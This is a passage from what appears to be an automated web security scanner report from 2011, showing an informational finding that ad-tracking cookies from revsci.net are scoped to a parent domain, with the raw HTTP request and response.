2xwBlmlZnc/vy3Fi31gon/6p7zhOIxDCGiKwEFknz7vadgGqld1cLwqzH6OhAfY8jsa8p/26SOjOygKEBIgsrm+13EcEK+6PNyPsimfyFeYkUHabdz8dGftnMPLgf7+B8Zx14LqwoUkwEzF4omy4BUQUOm2iPErATdY015XBw/3ngiiZYGnwMjyKAYQ6Go969u6BjTqw1Dlng/CNJPq7KdHKtbhWeDZIswWfS+UXRS226Ov8g5X+6P2i7NhxTKJbnBNDPHleNXzq+KRB/tUMjhb+TyiAfkxVF2E2L3v5xUy221azIhh7ArlMe3ZXI7sXJlF0YqHE/fsVdNop89QLOCGlS2np1IqezLb7srY/u9dJepf/59b38dqo3zGkfUdtHC8MK0MM4gGjo2su0M8iS+RWiOUs4V30Py9KJ+qjnOkhJMjIZvZ5R/sfHr78ja97y6gpUz6sLuYOUsD1JY6XZxF9mXiOn8pGzt3QGrPV5unR/EPPonFSA6Oj6Ei8ImLz7WprXeIljuzyKYZ5azxgfeA==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:32:51 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:32:50 GMT
Content-Length: 729

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs=['D10898_10008','D10898_50009'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...

12.109. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/E06560/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5E+BOQMQjXaBYKN45JxEWZonQbANETYV16Mat4I4b3eMT2reJyCAgxkrwHXjdBvil8hUNDCmRKXxZ/h5kwHGDalHsUn87uxBUSRZe6pMV7IXAPkHJ/EslY/e+hSJN094zUMXzQfj8hmxHSBJ7AEpulZ1oXkkCn/Blsyrn3JSJrmbWqdf4oPwfw8s1avKa5/g2bnYmftJUS5a2QpPOcZ5FGnYPA20XCLsFAj4gjQlj0gaJCrbA7xiUF3xDkNZXu9lFgchACALQHL9xjiE+VtLJfehgdlcFRzmSi9LjaCWzYcU3gKkdqu5maEgKHQiMXJf06ArRXUFpd8OWxB/zbkXatz3tdH3C4yfAiRT/3uJJKawqTyAKW9V4DYMkiYcx7mAIEnwPIY9xFA/Fx5Kf5U855YOddjrQatXyOPyhRiYxkCa/6Jde20sP8NjEFyM3fgjVNpx0waaDT92u+w3u4O3690ypK9zsU5cqOLVdSuv2d4ymEdecfmmJv2dcMscOZSj4/Np6R1us/L8E4Dr2zDdz0omd2C+mm6SP7HP+eXXAGKBijKhvPh+a/dzwtIlc1LUBsUyqCWQmHggP4Ya3CwB6d4bMkMdIYCQAlL+xqn4mVhHhOzWWY6mt2GT7UlT4zYh4rcHb5CcpgHIsIldqNBoHQ==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:21:25 GMT; Path=/
NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adcb5&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df5849a&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 11-Jul-2011 11:21:25 GMT; Path=/
rtc_wvmh=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:21:25 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E06560/b3/0/3/noscript.gif?D=DM_LOC%3Dhttp%3A%2F%2Fwww.telegraph.co.uk%2F%253FRetargeting_Value%253DTelegraphUS_CrTag HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=5360&cb=e2781b91d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e11aa0e&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4dec54ae&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JSQLFwmA+G9pU+w6+pH+Y1R9p5LQR/PIErcU96K2/tyglu8b1bAZxS4F8a2TOPNPPf1VWx8hkmMPMfyrrSdcosckkFWddAYMSGIntIJ56bP4P6/Il+5XrH+SP65GfKkcTktT+ixYuA4cG8987ijB0kMgiihI/CcBBO2IqsXUHg2YYHfbCHNBhazznS2DvAC8+tzWf2ELwJXdNtkz3S15lcxAIV0jCVWSKLx6BBEp2g5ysbOCASmacns0b2oEU06QOgr+JI+knEB2opeaMgX0YCCq5ykpcHVa5zA8jy1taCQ7uuWuw9JSzUemChpFpnPjGbOsS8bMDnDhMbIVU/Zki9fH8LgIIjFadlPgUzhlWSUTdorFwXrakxfHpd8uTkt8bwi/X58M3dVWIiw59BnPa3Dgkr6qt6i5s5KQmj/AR42mN2FrHcTY86USjANLmsmsGQovFjQ0KaFEJUzTMUFi4tDdA2wjo1RBS3UGRLCfVS8fwwCfHWwHOgvphj2DXjDMqg5JFOAg3ZJmDwqgZFSlD6LTVY+FKiVmF1vbC6GY9ZvCvfb5/0b5kKZw5OnC6woFDP6KWiKQ52h4U; rtc_M4Zd=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; udm_0=MLv3NzMJZjpn3hc5wFS813Gq63dQ4yV9iELcns7XRnSRJyu5Y8IIde+Kg6mfGZlUB4SruQI4rTs4y2UgncVUg67T0dB9naIhEG35bFZpiOLnlDeWfgSTEifCxEyJ1ceTv+CvvfhLsErHWoX5vAgUisClWxkkFkhxs6Sv1tjV/vyxy4fyHWGaZ9JT9qnb+FkC8amdlQjXUQiyisWC5oDDw0PhPbCP3F9Z1qxK0beEcbhyyvGzihAkA/Vfk5Knkfc8nh+j/k1YU55yv/Pj6+8pRjOs0eCnapK0c7govd9KIGekeA92uHXiJmdOH3Fj86gGCeUHtlngmDdE3wiQpjMJinyKJsp3NUVfgvynJ8ChbRL1hJtD4ix7620XA3Cu43Q7rUALrFRB7hSYbnxH1DiakaRoPQGlDgsmHcZ6VNJViQNDlUUNBtQC9V/Bo1B8SV1qPwPkqpqKMoKx4EVolbD9I+B5ZaTp6LdNkplgtQGq2GBFC0RP20KwexUAxyyET0gYqUuE8snZn+eSFplsIg1DUqqukxdFonny1plhRnx77ZiZ/YytfcasGUM6qBoU8LURR266NFiuMKy3Q7qSqVNThgHPly1BQtxmYuE1I2to+TWhZgmpwEbU6M/Z9t8dBAw/RoVAXfz4gC+Ix2ftyJnvHv9D2uGCArULbvHTLc+r6V2GdNA0Qch7qlUOsrFgpzcj5CfW3dEVFQdPkbT1uGdCmrXtCPx3t/I0bCTNvXA8tkeYkWwjXW5dSJPOoB8XWpy37JCPFsCXQBX6nI88AH++/1ww9pK76sPlx5hKUa+2lHQS9q0ssezOFdXJbxOIoP2/zVx7uNsWnulFgCUuGnZiv34zCdfIwORufZ/aFEbttB86Ty9IbNn1bPDk89J2JRbg2tYNleBBsRFD+ezR2ymlRUIZM1BlN3xid2OePOp2U/AsvF1a0JuT7MtoUkFmGqGNRTtReaom/4ubmFRLyawfTvXiRUf+9sYaXeajN9TIQZcYUHADPCytuemY6ogkyV8cvZpCiidb5NjP5ZHu2i1ZADHx2Z3GJg/74NQ5iDinPeSBGyQLrVGSmL8EI2ychKfySxZaVn0pR/X58c6ZROzpGbWFWEBdbXRtX57fcyU0J6HPGhhU6ja7heRrL6zMkHx24erUBtdcdKoCEQkWDvqFAUiZjWn2pQrJBmDDPJiDAhugHkPqBuRwoNkcFHM+Ul1CXV0xjhlpTJAN5BWVuiNwGr2UO4VipnJucbDlYsFREeH5YdOwEjKBA/E9Rt9BLiuJBMlxjdA5LAipAsvZqktR2IY/FiQaf9UqERS6fceUDbpf2RHgSxyB6GJmoT5/jWlVrw7+UqF/SBkEGMBMSGrfRvLoQbh+VWCASXh9QowKqow4YiH3URFCK98HsRl+ktH12AxKPTkO3N3ku/EoB8w+GDlrCM8/rz0p5O2U4rFI8tTeaQnc9s/cxneMy93qzcjR2EsI311rxEnOippysW4MsvYNXJV2DVTJx5dMgzdL+sjtnJObK46UpX+uvyYcKXRWZORvu59UXBHjMTQOFsaamGFEJlVtL6RuDUn7c0hZKI3ihf5kDNRl5G5vN5jkwCaqUDdKc1rya43vP0DgBrQrrnh22h/hLsSXrw0kmDs/yvZvB3yF8Ma2aUzT7TwofCD8sSXhkJ5pmhWPgOtW76NBA7LDWFkE1u9KpZPYUEKnzM2LYQqZUm3eYoh+G78=; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_KnBd="MLsXtaEuLjhnJ5H4uuj6RIn8q1zxXkRaxrcCnA/XZiexnJudKcBKFqX3d5gJtWlys7/aNmF8oZqyUuBF44LLsBp/XmHM56eUfVPr2ig9T6usUThEu2SqpAPvDqb6CyW6nYvjH55JvTEz7ztCB8UDyiuPPYeValoCtghc53ATcftLlZjnEgAPGIuT3ccVrMzGzcsN38GTvgf4/xW4hsUQY0o/mUCkjdomf5pMOwHwd7oxLJKSBO3UaEv1fSc+XxMcAbYQgzBKRrnTMVWQerlfyFrtHciD2WRj9Hl6FvA3VUak9Qt7o0e6fPEJsGJqVJkoLLdjSFpfpsMzHUbwM9OnItS46jK+7cAOnbtY8Ab340ENjp4oJt9Sm3XYqMgVtXazcRrw1dRB94ZkpCzHTf1wGhBH4TVzFOPMgM4VvO6l9W2pCbe9gL6mIu2Z3iV1SL6CRrHrt2hhFeS7E6X/JOCAGFAS8J4uXu8CfVms2bvl/TNZEa+jwdcWhmDo9rJzyLgpp2J9+0ZVtKPBK2fa00U8mjxUHtREi1DlGEWGI9qC72INlQ96yKONNH2Usf54jWCV59JB9+pmKoptb/M3tn1UBxLw7TOrvaGH2Vgu0qnpeESbbFW8oYECJwOx+T0PnZUmJyMAgUnwKdSxoQ5/oODIcrlhJ3cCFfD92UhjutN0crrFdWgNkQS65AT600jwikq34ITDYHMDmrqLYKfXZH2GgJjvI6nApXpU17mCK4ZqgCncSzwSyPT2t+2Hoqj4v1Y/Vl7cpU+m3uzXpoMQVtf2UGhbGYYYnXDE3CzsOhxZQeVgvkyopNpVxf2ol5Xxx/AhCkYT767N3KzAydtiKelxQf/g6tHbcsBwA9TTn9OrvCvjv6WdzqYlx9izGGG45S9WZPu7/zyeEoWybPlMvNc1Rpc/y2Cx9GUqJic9l6xTJAngZJXSZs+o41XOifpIFlJ7B4F+f607RMUfq1lseGpu+QNpPJM2iNlqXoTt9ik8U7vM8LgvcO1ZptgPI0/dOoVc//bTvzAueoNhAfybFk6RtIDuCQDEkWQQR/s00vMesVzR6+fjte0Ly7xbOq7Bq99zQL6bL0v73Fdn48baV2n71UFIbXsDqYg0kQCEo6eQ7NMyDvoCntLca0rKDrq4L/m0kT4FQlcT4jJF4rFH4hjWRpsoJAOPN4Aiz8qNXUY2XFyk45k984HTHv0NaRezUn0="; rsi_us_1000000="pUMlIy9H8BcU1P0/aqfkn2N1Aq78OHBl6ClrIVZfGzy1dmru/yhlpNRC/j+GgwUFYepOSFGHO/u1DXARCouzHHG+Ls8oVOk785qoU49AFwdml7FIDyQFDkTfPuH49HV1gXUZzy1SDhGCyhiPghO6BHg2KLacLC+JEomvevEz6AY4oFrYW/OTa8RlNPT19z7QLUXQbB6WQO7hrNSFTifVi+754gCvaBXBI5blvrX3W24Lr/6MwZDupYRWDMgGlTbvqpXv5leOYJIzI7SKLGy+IkwLaQ5E8hFwcUR/PCuBff/io/cjLbekqoieI1ELq8FXyhCdQ1ACHYn7+ZvsES11hQIq4yoVbtXQxVV9t5NEBwSv52icvj+fazqjuBUDZqw6BMDFY1K0sGNP9AOV4dT0ZhkTUQKsNT5/saAfR02CuGJK2rvaOKD9gTJUC/OOzDipobfdkJXYpsIXw2UiHUAeG38+6iUD9f24sH99k1q4QnShLTk2pbo+o6hEnr1SuDiz2Zc05B3RFfjTL2XZKuY/6eJCvw5B+ATymkNPiduuVgdeMHgMbwBTLFrOyP9TNSBZj4Z20Thdkoq/JyC8TH2eGO67FpwbVwGRx0b58He54D+AuAs5NNJVJeYha8gH8z+xOmSASpGJiBYY0UJW4Viy6eGQW2yNBastWhlxKoAnEpxuUsX33D3Jg7g3SMuEafTE3fFuGDlYUqrqWKEmBPF80lk+ykIO7FV6aF+4HF4UfYb7pA2L1g4oJE7gC+gEoCa+8CO4CAwoq8u4uvhwP56Pqv67srZgc4KfctHd5PY7lw+a1Doo4feQnlTa004zqSpWZ0cCh+x3qe+YJX8VGrKFBMGhQYyRtCtk2knN3OYQA7msg92HTm59G/lRvCd6IG1whn56kAc5eab/XpjluPIhh5r42fW1PPhevizTX5xNfLGPKg9+DOkAAVviDd8QpB+l9AWhhLpvS/KxYUAD1ZsedzdxsvRtr47/NbY7zlokTT639ngCJdSYkoq/N2d0hVMLGJ48b+XHrlzxh2zDkqYdpxZUA3IM6P1xQc0svwKk1XNb/h98JSrluzt7ewlP086tEzGourMC/RiWI4qdzHtVA4mNj5N+bCVGnyTuAoASB3OcSfq+kRPtoaUYJqkSueYSUrY03w/uoIAx8JaQc+YY1IB2EYem+UC3xKUas15kfbkv5mj29FtMloeU2fEWNjjE89J3i6pqtMssOIDJfHMCCezbfKMmTcGsiyFy/h183mZz9Bxo25q82nH5wHCOV963RzbZ+wLit78ETIizggf6HdYsEgHUsN9DZYcwpm97D7vYIWkEvVkhQ577tdx77XTsyM1waDuwz0mriwb0RVNxpuVjh74wJGO3Khd1Ej2G4l0wXXVeRXLaJpg3SjIhrAnkkm8lNJISMd64qsZX1BCKB4ogn8R57pQ/70kokmUAJkxtweHE7PHnhKC5eqqvGuB4qH4bp1S1f58dV8/Pkw2Ck8V/XMs4t4Khrz8TctV2753gQOb+Wrey1F5MQDCma4c0vVj0hY1BL3laNqQqgyHbRtQRsEgKiD1tulYdIPVXYixeTks0537ikMNaohAvHzDgnzmpsz5etYpkfcGkMw=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_M4Zd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uJev=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eC0O=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PWQ_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mCtf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LA6t=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ROU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5E+BOQMQjXaBYKN45JxEWZonQbANETYV16Mat4I4b3eMT2reJyCAgxkrwHXjdBvil8hUNDCmRKXxZ/h5kwHGDalHsUn87uxBUSRZe6pMV7IXAPkHJ/EslY/e+hSJN094zUMXzQfj8hmxHSBJ7AEpulZ1oXkkCn/Blsyrn3JSJrmbWqdf4oPwfw8s1avKa5/g2bnYmftJUS5a2QpPOcZ5FGnYPA20XCLsFAj4gjQlj0gaJCrbA7xiUF3xDkNZXu9lFgchACALQHL9xjiE+VtLJfehgdlcFRzmSi9LjaCWzYcU3gKkdqu5maEgKHQiMXJf06ArRXUFpd8OWxB/zbkXatz3tdH3C4yfAiRT/3uJJKawqTyAKW9V4DYMkiYcx7mAIEnwPIY9xFA/Fx5Kf5U855YOddjrQatXyOPyhRiYxkCa/6Jde20sP8NjEFyM3fgjVNpx0waaDT92u+w3u4O3690ypK9zsU5cqOLVdSuv2d4ymEdecfmmJv2dcMscOZSj4/Np6R1us/L8E4Dr2zDdz0omd2C+mm6SP7HP+eXXAGKBijKhvPh+a/dzwtIlc1LUBsUyqCWQmHggP4Ya3CwB6d4bMkMdIYCQAlL+xqn4mVhHhOzWWY6mt2GT7UlT4zYh4rcHb5CcpgHIsIldqNBoHQ==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:21:25 GMT; Path=/
Set-Cookie: NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adcb5&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df5849a&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 11-Jul-2011 11:21:25 GMT; Path=/
Set-Cookie: rtc_wvmh=MLvH+QcJZzpn51KdVOOawugcxc1MUbaLN+LRv9fsOPOoIxCHZ+c94Pcex/R8ZgXYgXh8ezDfJgWUAcNEAHUkgF9nZyNsL69MbXeqLzkb5nZgZnRA5HGBba7s/naelNCYi9rfUYjqmcMbivUveIY1VA9qN4uA8yg90tkK4TR9dvq5DvI0uE03OIUKZO0jcTBtzJFFDFI6zUgGCnwTUYm1d4wqN/iX+yRRUHGeXE7MKfo9MDz/kzhwQkk/9jfSzx9CWOz2oUJhdp8WJozr/c2znve7kLTWiGNHJRw5/njIb0PggdZ2tn0ZrMLS7HHnu7zZ1Umce/6YIByDhM7gsv5Tv6P4khxnnlzz+y+a9thp52f/UWLgXhnFPmZWrnuYMQM3dvnL54rzkyTr3KCiB1m+bFCfbA1g3vvrkGqEFcK2/kn/FQOyT2/XgMi5Tw6bV5PH4Hr9rj4m32iRbjJlZRhB7kNZS9Nd1FjRh7VHvr65h8Ih/CxXKtiH9xqC5FT0rM50mkyZeibIBlvdPIJhopeE5Yd+BZaCVJv2kUqzhggo4H+/KLrUJjEmd5Z4z6GpLW1PEPwSsR9on9sIpPyndmXzXQ8snfCnBWhriCTDXS+NB9IizWpQavMkI5Zqik+nRe94GlWTt2rFXDSvIVrnPBJ0cwajvpKDu0MId+tGaWGsuKC0YqVv8pjhFknsLLE+1lgveVEUA1wdamBrl/cy+LXHUZ6+hPOU60beDSqrsoJh8+XKEoUtN+leAZ0sUx5ahKbl+YIFhGxwofTKyKdRqJrdJ1g7NITLO/cvMBrEONmwwy7tHgjrcMyE3p/XSY4L3NXHzkcZFyPitr4nNQX7uGd8BXEJvFHB50tG9/RLMRrF/V4N3UW0iqMkOUbA/kM9J2KBE/70N40OrO7OSdmYPT7qj9zdT5pIUxYXGVLmOyOO3de/O7VE3W4wbHDYZCeUW+GnXO0bWvKwjFe1E/kL70enfINb9MZ4XW34eN0G2iyNPKSnnmpJoimEDUKivgL2XA/zFBWTMIUThHawxl/9mWyOg7L7x+r1y2THGUmS9aW1d00X/Wxbxy8rDuhlV6UWWK4QQdTGeFVYQJ1u0j9964EZa1NplznpR7tjBBxSEISP2R0RnU6sOZUujX3xgdsTdd5udLR1ssbs2azPvvhBHjiNIkTKFaOENJMYQP2WDkZsbwc8MfqvctOfwAZ7l5dL0pIWXDP3/2d5UqhL5+4tDNvQ+EGhYvoEG0RKwleR4tU+tHvRVbFMCqrRrd5M0a+48dkgQxEnQ6